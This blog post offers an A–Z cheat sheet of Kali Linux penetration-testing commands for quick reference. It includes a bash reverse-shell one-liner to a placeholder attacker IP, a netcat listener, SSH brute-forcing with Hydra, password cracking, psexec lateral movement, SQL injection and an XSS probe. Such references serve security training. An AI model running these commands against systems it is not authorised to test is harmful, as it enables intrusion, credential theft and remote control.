Header Ads

Kali Linux Cheat Sheet (A–Z) for Cybersecurity Engineers & Enthusiasts

September 16, 2025

Kali Linux A–Z Quick Reference Poster

Condensed one-page cheat sheet — essential tools & commands for fast recall.


A — Aircrack-ng
airmon-ng start wlan0
airodump-ng wlan0mon -w capture
aircrack-ng -w rockyou.txt capture.cap
B — Burp Suite
burpsuite # launch web proxy
C — Curl / Crontab
curl -I https://site
crontab -l
D — Dirb / Dig
gobuster dir -u http://target -w /usr/share/wordlists/common.txt
dig example.com
E — Enum4linux
enum4linux -a target
F — Find / Ffuf
find / -name "secret*" 2>/dev/null
ffuf -u http://target/FUZZ -w wordlist.txt
G — Gobuster / Grep
gobuster dir -u http://target -w common.txt
grep -Rni "password" .
H — Hydra / Hashcat
hydra -l admin -P rockyou.txt ssh://target
hashcat -m 1000 hash.txt rockyou.txt
I — Impacket
psexec.py DOMAIN/user:pass@target
J — John
john --wordlist=rockyou.txt hashfile
K — Kali Undercover
kali-undercover
L — Linpeas
./linpeas.sh
M — Metasploit / Masscan
msfconsole
masscan -p1-65535 10.0.0.0/8 --rate=10000
N — Nmap / Netcat
nmap -sS -sV -p- target
nc -lvnp 4444
O — OSINT
theharvester -d example.com -b all
P — Python HTTP Server
python3 -m http.server 8000
Q — Quick Recon
whatweb https://site
R — Reverse Shell
bash -i >& /dev/tcp/ATT_IP/4444 0>&1
S — Sqlmap / SMB
sqlmap -u "http://site/page.php?id=1" --dbs
smbclient -L \\TARGET -U ""
T — Tcpdump / Top
tcpdump -i eth0 -w cap.pcap
top
U — Update
sudo apt update && sudo apt full-upgrade -y
V — Volatility
volatility -f memory.dmp pslist
W — Wireshark / Wpscan
wireshark cap.pcap
wpscan --url http://site
X — XSS Test
curl "http://site?q=<script>alert(1)</script>"
Y — Yersinia
yersinia -I
Z — Zone Transfer
dig axfr example.com @ns1.example.com

Must-know Wordlists

  • /usr/share/wordlists/rockyou.txt

  • /usr/share/seclists/


Post a Comment

No comments

Subscribe to: Post Comments ( Atom )
Theme images by enot-poloskun. Powered by Blogger.